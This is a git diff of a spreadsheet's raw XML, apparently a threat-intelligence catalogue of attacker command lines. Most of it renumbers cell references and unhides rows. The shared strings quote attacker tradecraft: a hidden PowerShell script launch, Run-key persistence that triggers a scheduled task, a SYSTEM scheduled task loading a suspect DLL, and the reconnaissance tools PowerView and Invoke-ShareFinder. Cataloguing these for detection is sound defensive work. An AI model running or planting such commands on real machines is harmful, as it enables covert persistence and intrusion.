       <c r="E180" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F180" t="s">
-        <v>293</v>
-      </c>
-    </row>
-    <row r="181" spans="1:6" ht="34" hidden="1">
+        <v>292</v>
+      </c>
+    </row>
+    <row r="181" spans="1:6" ht="34">
       <c r="A181" t="s">
         <v>21</v>
       </c>
       <c r="B181" s="1" t="s">
-        <v>322</v>
+        <v>321</v>
       </c>
       <c r="C181" s="1"/>
       <c r="E181" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F181" t="s">
-        <v>324</v>
-      </c>
-    </row>
-    <row r="182" spans="1:6" ht="34" hidden="1">
+        <v>323</v>
+      </c>
+    </row>
+    <row r="182" spans="1:6" ht="34">
       <c r="A182" t="s">
         <v>21</v>
       </c>
       <c r="B182" s="1" t="s">
-        <v>351</v>
+        <v>350</v>
       </c>
       <c r="C182" s="1"/>
       <c r="E182" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F182" t="s">
-        <v>349</v>
-      </c>
-    </row>
-    <row r="183" spans="1:6" ht="51" hidden="1">
+        <v>348</v>
+      </c>
+    </row>
+    <row r="183" spans="1:6" ht="51">
       <c r="A183" t="s">
         <v>21</v>
       </c>
       <c r="B183" s="1" t="s">
-        <v>352</v>
+        <v>351</v>
       </c>
       <c r="C183" s="1"/>
       <c r="E183" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F183" t="s">
-        <v>349</v>
-      </c>
-    </row>
-    <row r="184" spans="1:6" ht="34" hidden="1">
+        <v>348</v>
+      </c>
+    </row>
+    <row r="184" spans="1:6" ht="34">
       <c r="A184" t="s">
         <v>21</v>
       </c>
       <c r="B184" s="1" t="s">
-        <v>353</v>
+        <v>352</v>
       </c>
       <c r="C184" s="1"/>
       <c r="E184" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F184" t="s">
-        <v>349</v>
-      </c>
-    </row>
-    <row r="185" spans="1:6" ht="17" hidden="1">
+        <v>348</v>
+      </c>
+    </row>
+    <row r="185" spans="1:6" ht="17">
       <c r="A185" t="s">
-        <v>334</v>
+        <v>333</v>
       </c>
       <c r="B185" s="1" t="s">
-        <v>332</v>
+        <v>331</v>
       </c>
       <c r="C185" s="1"/>
       <c r="E185" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F185" t="s">
-        <v>331</v>
-      </c>
-    </row>
-    <row r="186" spans="1:6" ht="17" hidden="1">
+        <v>330</v>
+      </c>
+    </row>
+    <row r="186" spans="1:6" ht="17">
       <c r="A186" t="s">
-        <v>334</v>
+        <v>333</v>
       </c>
       <c r="B186" s="1" t="s">
+        <v>375</v>
+      </c>
+      <c r="C186" s="1" t="s">
         <v>376</v>
       </c>
-      <c r="C186" s="1" t="s">
-        <v>377</v>
-      </c>
       <c r="E186" t="s">
-        <v>380</v>
+        <v>379</v>
       </c>
       <c r="F186" t="s">
-        <v>379</v>
-      </c>
-    </row>
-    <row r="187" spans="1:6" ht="17" hidden="1">
+        <v>378</v>
+      </c>
+    </row>
+    <row r="187" spans="1:6" ht="17">
       <c r="A187" t="s">
-        <v>219</v>
+        <v>218</v>
       </c>
       <c r="B187" s="1" t="s">
-        <v>88</v>
+        <v>87</v>
       </c>
       <c r="C187" s="1"/>
       <c r="E187" t="s">
         <v>6</v>
       </c>
       <c r="F187" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="188" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="188" spans="1:6" ht="17">
       <c r="A188" t="s">
-        <v>219</v>
+        <v>218</v>
       </c>
       <c r="B188" s="1" t="s">
-        <v>88</v>
+        <v>87</v>
       </c>
       <c r="C188" s="1"/>
       <c r="E188" t="s">
         <v>6</v>
       </c>
       <c r="F188" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="189" spans="1:6" ht="34" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="189" spans="1:6" ht="34">
       <c r="A189" t="s">
-        <v>219</v>
+        <v>218</v>
       </c>
       <c r="B189" s="1" t="s">
+        <v>212</v>
+      </c>
+      <c r="C189" s="1" t="s">
         <v>213</v>
       </c>
-      <c r="C189" s="1" t="s">
-        <v>214</v>
-      </c>
       <c r="E189" t="s">
-        <v>142</v>
+        <v>141</v>
       </c>
       <c r="F189" t="s">
-        <v>152</v>
-      </c>
-    </row>
-    <row r="190" spans="1:6" ht="136" hidden="1">
+        <v>151</v>
+      </c>
+    </row>
+    <row r="190" spans="1:6" ht="136">
       <c r="A190" t="s">
-        <v>219</v>
+        <v>218</v>
       </c>
       <c r="B190" s="1" t="s">
-        <v>218</v>
+        <v>217</v>
       </c>
       <c r="C190" s="1"/>
       <c r="E190" t="s">
-        <v>228</v>
+        <v>227</v>
       </c>
       <c r="F190" t="s">
-        <v>227</v>
-      </c>
-    </row>
-    <row r="191" spans="1:6" ht="17" hidden="1">
+        <v>226</v>
+      </c>
+    </row>
+    <row r="191" spans="1:6" ht="17">
       <c r="A191" t="s">
-        <v>219</v>
+        <v>218</v>
       </c>
       <c r="B191" s="1" t="s">
+        <v>255</v>
+      </c>
+      <c r="C191" s="1" t="s">
         <v>256</v>
       </c>
-      <c r="C191" s="1" t="s">
-        <v>257</v>
-      </c>
       <c r="E191" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F191" t="s">
-        <v>237</v>
-      </c>
-    </row>
-    <row r="192" spans="1:6" ht="119" hidden="1">
+        <v>236</v>
+      </c>
+    </row>
+    <row r="192" spans="1:6" ht="119">
       <c r="A192" t="s">
-        <v>219</v>
+        <v>218</v>
       </c>
       <c r="B192" s="1" t="s">
-        <v>323</v>
+        <v>322</v>
       </c>
       <c r="C192" s="1"/>
       <c r="E192" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F192" t="s">
-        <v>324</v>
-      </c>
-    </row>
-    <row r="193" spans="1:6" ht="17" hidden="1">
+        <v>323</v>
+      </c>
+    </row>
+    <row r="193" spans="1:6" ht="17">
       <c r="A193" t="s">
-        <v>215</v>
+        <v>214</v>
       </c>
       <c r="B193" s="1" t="s">
+        <v>204</v>
+      </c>
+      <c r="C193" s="1" t="s">
         <v>205</v>
       </c>
-      <c r="C193" s="1" t="s">
-        <v>206</v>
-      </c>
       <c r="E193" t="s">
-        <v>142</v>
+        <v>141</v>
       </c>
       <c r="F193" t="s">
-        <v>152</v>
-      </c>
-    </row>
-    <row r="194" spans="1:6" ht="68" hidden="1">
+        <v>151</v>
+      </c>
+    </row>
+    <row r="194" spans="1:6" ht="68">
       <c r="A194" t="s">
+        <v>104</v>
+      </c>
+      <c r="B194" s="1" t="s">
+        <v>103</v>
+      </c>
+      <c r="C194" s="1" t="s">
         <v>105</v>
       </c>
-      <c r="B194" s="1" t="s">
-        <v>104</v>
-      </c>
-      <c r="C194" s="1" t="s">
-        <v>106</v>
-      </c>
       <c r="E194" t="s">
         <v>6</v>
       </c>
       <c r="F194" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="195" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="195" spans="1:6" ht="17">
       <c r="A195" t="s">
         <v>29</v>
       </c>
@@ -4877,7 +4910,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="196" spans="1:6" ht="17" hidden="1">
+    <row r="196" spans="1:6" ht="17">
       <c r="A196" t="s">
         <v>29</v>
       </c>
@@ -4894,112 +4927,112 @@
         <v>28</v>
       </c>
     </row>
-    <row r="197" spans="1:6" ht="17" hidden="1">
+    <row r="197" spans="1:6" ht="17">
       <c r="A197" t="s">
-        <v>308</v>
+        <v>307</v>
       </c>
       <c r="B197" s="1" t="s">
         <v>58</v>
       </c>
       <c r="C197" s="1"/>
       <c r="E197" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F197" t="s">
-        <v>310</v>
-      </c>
-    </row>
-    <row r="198" spans="1:6" ht="17" hidden="1">
+        <v>309</v>
+      </c>
+    </row>
+    <row r="198" spans="1:6" ht="17">
       <c r="A198" t="s">
-        <v>285</v>
+        <v>284</v>
       </c>
       <c r="B198" s="1" t="s">
-        <v>223</v>
+        <v>222</v>
       </c>
       <c r="C198" s="1"/>
       <c r="E198" t="s">
-        <v>228</v>
+        <v>227</v>
       </c>
       <c r="F198" t="s">
-        <v>227</v>
-      </c>
-    </row>
-    <row r="199" spans="1:6" ht="323" hidden="1">
+        <v>226</v>
+      </c>
+    </row>
+    <row r="199" spans="1:6" ht="323">
       <c r="A199" t="s">
-        <v>285</v>
+        <v>284</v>
       </c>
       <c r="B199" s="1" t="s">
-        <v>329</v>
+        <v>328</v>
       </c>
       <c r="C199" s="1"/>
       <c r="E199" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F199" t="s">
-        <v>324</v>
-      </c>
-    </row>
-    <row r="200" spans="1:6" ht="68" hidden="1">
+        <v>323</v>
+      </c>
+    </row>
+    <row r="200" spans="1:6" ht="68">
       <c r="A200" t="s">
-        <v>284</v>
+        <v>283</v>
       </c>
       <c r="B200" s="1" t="s">
-        <v>282</v>
+        <v>281</v>
       </c>
       <c r="C200" s="1"/>
       <c r="E200" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F200" t="s">
-        <v>288</v>
-      </c>
-    </row>
-    <row r="201" spans="1:6" ht="68" hidden="1">
+        <v>287</v>
+      </c>
+    </row>
+    <row r="201" spans="1:6" ht="68">
       <c r="A201" t="s">
-        <v>284</v>
+        <v>283</v>
       </c>
       <c r="B201" s="1" t="s">
-        <v>283</v>
+        <v>282</v>
       </c>
       <c r="C201" s="1"/>
       <c r="E201" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F201" t="s">
-        <v>288</v>
-      </c>
-    </row>
-    <row r="202" spans="1:6" ht="51" hidden="1">
+        <v>287</v>
+      </c>
+    </row>
+    <row r="202" spans="1:6" ht="51">
       <c r="A202" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="B202" s="1" t="s">
-        <v>109</v>
+        <v>108</v>
       </c>
       <c r="C202" s="1"/>
       <c r="E202" t="s">
         <v>6</v>
       </c>
       <c r="F202" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="203" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="203" spans="1:6" ht="17">
       <c r="A203" t="s">
-        <v>111</v>
+        <v>110</v>
       </c>
       <c r="B203" s="1" t="s">
-        <v>110</v>
+        <v>109</v>
       </c>
       <c r="C203" s="1"/>
       <c r="E203" t="s">
         <v>6</v>
       </c>
       <c r="F203" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="204" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="204" spans="1:6" ht="17">
       <c r="A204" t="s">
         <v>24</v>
       </c>
@@ -5016,7 +5049,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="205" spans="1:6" ht="17" hidden="1">
+    <row r="205" spans="1:6" ht="17">
       <c r="A205" t="s">
         <v>24</v>
       </c>
@@ -5033,7 +5066,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="206" spans="1:6" ht="17" hidden="1">
+    <row r="206" spans="1:6" ht="17">
       <c r="A206" t="s">
         <v>24</v>
       </c>
@@ -5050,7 +5083,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="207" spans="1:6" ht="17" hidden="1">
+    <row r="207" spans="1:6" ht="17">
       <c r="A207" t="s">
         <v>24</v>
       </c>
@@ -5067,144 +5100,144 @@
         <v>28</v>
       </c>
     </row>
-    <row r="208" spans="1:6" ht="17" hidden="1">
+    <row r="208" spans="1:6" ht="17">
       <c r="A208" t="s">
         <v>24</v>
       </c>
       <c r="B208" s="1" t="s">
-        <v>76</v>
+        <v>75</v>
       </c>
       <c r="C208" s="1"/>
       <c r="E208" t="s">
         <v>6</v>
       </c>
       <c r="F208" t="s">
-        <v>71</v>
-      </c>
-    </row>
-    <row r="209" spans="1:6" ht="17" hidden="1">
+        <v>70</v>
+      </c>
+    </row>
+    <row r="209" spans="1:6" ht="17">
       <c r="A209" t="s">
         <v>24</v>
       </c>
       <c r="B209" s="1" t="s">
-        <v>134</v>
+        <v>133</v>
       </c>
       <c r="C209" s="1"/>
       <c r="E209" t="s">
         <v>6</v>
       </c>
       <c r="F209" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="210" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="210" spans="1:6" ht="17">
       <c r="A210" t="s">
         <v>24</v>
       </c>
       <c r="B210" s="1" t="s">
-        <v>243</v>
+        <v>242</v>
       </c>
       <c r="C210" s="1"/>
       <c r="E210" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F210" t="s">
-        <v>237</v>
-      </c>
-    </row>
-    <row r="211" spans="1:6" ht="17" hidden="1">
+        <v>236</v>
+      </c>
+    </row>
+    <row r="211" spans="1:6" ht="17">
       <c r="A211" t="s">
         <v>24</v>
       </c>
       <c r="B211" s="1" t="s">
-        <v>244</v>
+        <v>243</v>
       </c>
       <c r="C211" s="1"/>
       <c r="E211" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F211" t="s">
-        <v>237</v>
-      </c>
-    </row>
-    <row r="212" spans="1:6" ht="34" hidden="1">
+        <v>236</v>
+      </c>
+    </row>
+    <row r="212" spans="1:6" ht="34">
       <c r="A212" t="s">
         <v>24</v>
       </c>
       <c r="B212" s="1" t="s">
+        <v>265</v>
+      </c>
+      <c r="C212" s="1" t="s">
         <v>266</v>
       </c>
-      <c r="C212" s="1" t="s">
-        <v>267</v>
-      </c>
       <c r="E212" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F212" t="s">
-        <v>237</v>
-      </c>
-    </row>
-    <row r="213" spans="1:6" ht="17" hidden="1">
+        <v>236</v>
+      </c>
+    </row>
+    <row r="213" spans="1:6" ht="17">
       <c r="A213" t="s">
         <v>24</v>
       </c>
       <c r="B213" s="1" t="s">
-        <v>286</v>
+        <v>285</v>
       </c>
       <c r="C213" s="1"/>
       <c r="E213" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F213" t="s">
-        <v>288</v>
-      </c>
-    </row>
-    <row r="214" spans="1:6" ht="17" hidden="1">
+        <v>287</v>
+      </c>
+    </row>
+    <row r="214" spans="1:6" ht="17">
       <c r="A214" t="s">
         <v>24</v>
       </c>
       <c r="B214" s="1" t="s">
-        <v>287</v>
+        <v>286</v>
       </c>
       <c r="C214" s="1"/>
       <c r="E214" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F214" t="s">
-        <v>288</v>
-      </c>
-    </row>
-    <row r="215" spans="1:6" ht="204" hidden="1">
+        <v>287</v>
+      </c>
+    </row>
+    <row r="215" spans="1:6" ht="204">
       <c r="A215" t="s">
         <v>24</v>
       </c>
       <c r="B215" s="1" t="s">
-        <v>294</v>
+        <v>293</v>
       </c>
       <c r="C215" s="1"/>
       <c r="E215" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F215" t="s">
-        <v>293</v>
-      </c>
-    </row>
-    <row r="216" spans="1:6" ht="17" hidden="1">
+        <v>292</v>
+      </c>
+    </row>
+    <row r="216" spans="1:6" ht="17">
       <c r="A216" t="s">
         <v>24</v>
       </c>
       <c r="B216" s="1" t="s">
-        <v>388</v>
+        <v>387</v>
       </c>
       <c r="C216" s="1"/>
       <c r="E216" t="s">
+        <v>383</v>
+      </c>
+      <c r="F216" t="s">
         <v>384</v>
       </c>
-      <c r="F216" t="s">
-        <v>385</v>
-      </c>
-    </row>
-    <row r="217" spans="1:6" ht="17" hidden="1">
+    </row>
+    <row r="217" spans="1:6" ht="17">
       <c r="A217" t="s">
         <v>40</v>
       </c>
@@ -5221,7 +5254,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="218" spans="1:6" ht="17" hidden="1">
+    <row r="218" spans="1:6" ht="17">
       <c r="A218" t="s">
         <v>40</v>
       </c>
@@ -5238,7 +5271,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="219" spans="1:6" ht="34" hidden="1">
+    <row r="219" spans="1:6" ht="34">
       <c r="A219" t="s">
         <v>40</v>
       </c>
@@ -5255,12 +5288,12 @@
         <v>28</v>
       </c>
     </row>
-    <row r="220" spans="1:6" ht="17" hidden="1">
+    <row r="220" spans="1:6" ht="17">
       <c r="A220" t="s">
         <v>40</v>
       </c>
       <c r="B220" s="1" t="s">
-        <v>80</v>
+        <v>79</v>
       </c>
       <c r="C220" s="1" t="s">
         <v>55</v>
@@ -5269,110 +5302,110 @@
         <v>6</v>
       </c>
       <c r="F220" t="s">
-        <v>71</v>
-      </c>
-    </row>
-    <row r="221" spans="1:6" ht="17" hidden="1">
+        <v>70</v>
+      </c>
+    </row>
+    <row r="221" spans="1:6" ht="17">
       <c r="A221" t="s">
         <v>40</v>
       </c>
       <c r="B221" s="1" t="s">
+        <v>92</v>
+      </c>
+      <c r="C221" s="1" t="s">
         <v>93</v>
       </c>
-      <c r="C221" s="1" t="s">
-        <v>94</v>
-      </c>
       <c r="E221" t="s">
         <v>6</v>
       </c>
       <c r="F221" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="222" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="222" spans="1:6" ht="17">
       <c r="A222" t="s">
         <v>40</v>
       </c>
       <c r="B222" s="1" t="s">
-        <v>119</v>
+        <v>118</v>
       </c>
       <c r="C222" s="1" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="E222" t="s">
         <v>6</v>
       </c>
       <c r="F222" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="223" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="223" spans="1:6" ht="17">
       <c r="A223" t="s">
         <v>40</v>
       </c>
       <c r="B223" s="1" t="s">
-        <v>120</v>
+        <v>119</v>
       </c>
       <c r="C223" s="1" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="E223" t="s">
         <v>6</v>
       </c>
       <c r="F223" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="224" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="224" spans="1:6" ht="17">
       <c r="A224" t="s">
         <v>40</v>
       </c>
       <c r="B224" s="1" t="s">
-        <v>121</v>
+        <v>120</v>
       </c>
       <c r="C224" s="1" t="s">
-        <v>123</v>
+        <v>122</v>
       </c>
       <c r="E224" t="s">
         <v>6</v>
       </c>
       <c r="F224" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="225" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="225" spans="1:6" ht="17">
       <c r="A225" t="s">
         <v>40</v>
       </c>
       <c r="B225" s="1" t="s">
+        <v>121</v>
+      </c>
+      <c r="C225" s="1" t="s">
         <v>122</v>
       </c>
-      <c r="C225" s="1" t="s">
-        <v>123</v>
-      </c>
       <c r="E225" t="s">
         <v>6</v>
       </c>
       <c r="F225" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="226" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="226" spans="1:6" ht="17">
       <c r="A226" t="s">
         <v>40</v>
       </c>
       <c r="B226" s="1" t="s">
-        <v>138</v>
+        <v>137</v>
       </c>
       <c r="C226" s="1"/>
       <c r="E226" t="s">
         <v>6</v>
       </c>
       <c r="F226" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="227" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="227" spans="1:6" ht="17">
       <c r="A227" t="s">
         <v>11</v>
       </c>
@@ -5389,7 +5422,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="228" spans="1:6" ht="17" hidden="1">
+    <row r="228" spans="1:6" ht="17">
       <c r="A228" t="s">
         <v>11</v>
       </c>
@@ -5406,7 +5439,7 @@
         <v>7</v>
       </c>
     </row>
-    <row r="229" spans="1:6" ht="17" hidden="1">
+    <row r="229" spans="1:6" ht="17">
       <c r="A229" t="s">
         <v>11</v>
       </c>
@@ -5423,7 +5456,7 @@
         <v>28</v>
       </c>
     </row>
-    <row r="230" spans="1:6" ht="17" hidden="1">
+    <row r="230" spans="1:6" ht="17">
       <c r="A230" t="s">
         <v>11</v>
       </c>
@@ -5440,156 +5473,156 @@
         <v>28</v>
       </c>
     </row>
-    <row r="231" spans="1:6" ht="17" hidden="1">
+    <row r="231" spans="1:6" ht="17">
       <c r="A231" t="s">
         <v>11</v>
       </c>
       <c r="B231" s="1" t="s">
-        <v>72</v>
+        <v>71</v>
       </c>
       <c r="C231" s="1"/>
       <c r="E231" t="s">
         <v>6</v>
       </c>
       <c r="F231" t="s">
-        <v>71</v>
-      </c>
-    </row>
-    <row r="232" spans="1:6" ht="17" hidden="1">
+        <v>70</v>
+      </c>
+    </row>
+    <row r="232" spans="1:6" ht="17">
       <c r="A232" t="s">
         <v>11</v>
       </c>
       <c r="B232" s="1" t="s">
-        <v>135</v>
+        <v>134</v>
       </c>
       <c r="C232" s="1"/>
       <c r="E232" t="s">
         <v>6</v>
       </c>
       <c r="F232" t="s">
-        <v>89</v>
-      </c>
-    </row>
-    <row r="233" spans="1:6" ht="17" hidden="1">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="233" spans="1:6" ht="17">
       <c r="A233" t="s">
         <v>11</v>
       </c>
       <c r="B233" s="1" t="s">
-        <v>309</v>
+        <v>308</v>
       </c>
       <c r="C233" s="1"/>
       <c r="E233" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F233" t="s">
-        <v>310</v>
-      </c>
-    </row>
-    <row r="234" spans="1:6" ht="34" hidden="1">
+        <v>309</v>
+      </c>
+    </row>
+    <row r="234" spans="1:6" ht="34">
       <c r="A234" t="s">
         <v>11</v>
       </c>
       <c r="B234" s="1" t="s">
-        <v>339</v>
+        <v>338</v>
       </c>
       <c r="C234" s="1"/>
       <c r="E234" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F234" t="s">
-        <v>331</v>
-      </c>
-    </row>
-    <row r="235" spans="1:6" ht="17" hidden="1">
+        <v>330</v>
+      </c>
+    </row>
+    <row r="235" spans="1:6" ht="17">
       <c r="A235" t="s">
         <v>11</v>
       </c>
       <c r="B235" s="1" t="s">
-        <v>340</v>
+        <v>339</v>
       </c>
       <c r="C235" s="1"/>
       <c r="E235" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F235" t="s">
-        <v>341</v>
-      </c>
-    </row>
-    <row r="236" spans="1:6" ht="17" hidden="1">
+        <v>340</v>
+      </c>
+    </row>
+    <row r="236" spans="1:6" ht="17">
       <c r="A236" t="s">
         <v>11</v>
       </c>
       <c r="B236" s="1" t="s">
-        <v>343</v>
+        <v>342</v>
       </c>
       <c r="C236" s="1"/>
       <c r="E236" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F236" t="s">
-        <v>341</v>
-      </c>
-    </row>
-    <row r="237" spans="1:6" ht="17" hidden="1">
+        <v>340</v>
+      </c>
+    </row>
+    <row r="237" spans="1:6" ht="17">
       <c r="A237" t="s">
         <v>11</v>
       </c>
       <c r="B237" s="1" t="s">
-        <v>345</v>
+        <v>344</v>
       </c>
       <c r="C237" s="1"/>
       <c r="E237" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F237" t="s">
-        <v>341</v>
-      </c>
-    </row>
-    <row r="238" spans="1:6" ht="34" hidden="1">
+        <v>340</v>
+      </c>
+    </row>
+    <row r="238" spans="1:6" ht="34">
       <c r="A238" t="s">
         <v>11</v>
       </c>
       <c r="B238" s="1" t="s">
-        <v>355</v>
+        <v>354</v>
       </c>
       <c r="C238" s="1"/>
       <c r="E238" t="s">
-        <v>311</v>
+        <v>310</v>
       </c>
       <c r="F238" t="s">
-        <v>349</v>
-      </c>
-    </row>
-    <row r="239" spans="1:6" ht="17" hidden="1">
+        <v>348</v>
+      </c>
+    </row>
+    <row r="239" spans="1:6" ht="17">
       <c r="A239" t="s">
         <v>11</v>
       </c>
       <c r="B239" s="1" t="s">
-        <v>387</v>
+        <v>386</v>
       </c>
       <c r="C239" s="1"/>
       <c r="E239" t="s">
+        <v>383</v>
+      </c>
+      <c r="F239" t="s">
         <v>384</v>
       </c>
-      <c r="F239" t="s">
-        <v>385</v>
-      </c>
-    </row>
-    <row r="240" spans="1:6" ht="51" hidden="1">
+    </row>
+    <row r="240" spans="1:6" ht="51">
       <c r="A240" t="s">
+        <v>278</v>
+      </c>
+      <c r="B240" s="1" t="s">
+        <v>277</v>
+      </c>
+      <c r="C240" s="1" t="s">
         <v>279</v>
       </c>
-      <c r="B240" s="1" t="s">
-        <v>278</v>
-      </c>
-      <c r="C240" s="1" t="s">
-        <v>280</v>
-      </c>
       <c r="E240" t="s">
-        <v>238</v>
+        <v>237</v>
       </c>
       <c r="F240" t="s">
-        <v>276</v>
+        <v>275</v>
       </c>
     </row>
   </sheetData>

--- a/docs/TIP-CommandLine.xlsx
+++ b/docs/TIP-CommandLine.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/SOC-Puppet/docs/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{F02FC3D6-43D6-A346-9B6A-30417EA9F00F}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0AA8F98D-FC4F-0F47-B15F-252293DC8C43}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{A9D12C86-CCAB-E94D-B7F0-B816A83AE7B1}"/>
   </bookViews>
@@ -682,9 +682,6 @@
     <t>Creates a Scheduled Task run as SYSTEM at 0443 AM. When the task is run, cmd.exe uses crundll32.exe to run the DLL file netsh.dll. (It is likely that netsh.dll is a malware file and not associated with netsh.)</t>
   </si>
   <si>
-    <t>SHARPSHARE</t>
-  </si>
-  <si>
     <t>start-process PowerShell.exe -arg C:\Users\Public\Music\&lt;file&gt;.ps1 -WindowStyle Hidden</t>
   </si>
   <si>
@@ -1034,9 +1031,6 @@
   </si>
   <si>
     <t>Invoke-ShareFinder</t>
-  </si>
-  <si>
-    <t>PowerView</t>
   </si>
   <si>
     <t>REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V \"microsoft update\" /t REG_SZ /F /D "SCHTASKS /run /tn 9T6ukfi6"</t>
@@ -1380,6 +1374,12 @@
   </si>
   <si>
     <t>NLTEST_P1000</t>
+  </si>
+  <si>
+    <t>POWERVIEW</t>
+  </si>
+  <si>
+    <t>SHARPPSHARE</t>
   </si>
 </sst>
 </file>
@@ -1454,7 +1454,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="7">
+  <cellXfs count="6">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
@@ -1462,8 +1462,7 @@
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
     <xf numFmtId="0" fontId="3" fillId="2" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
-    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1"/>
+    <xf numFmtId="0" fontId="3" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -1805,8 +1804,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{777F7044-177D-E446-92F0-ACF0229F6F68}">
   <dimension ref="A1:F240"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A77" workbookViewId="0">
-      <selection activeCell="B102" sqref="B102"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="B118" sqref="A118:F118"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -1840,152 +1839,152 @@
     </row>
     <row r="2" spans="1:6" ht="17">
       <c r="A2" t="s">
+        <v>310</v>
+      </c>
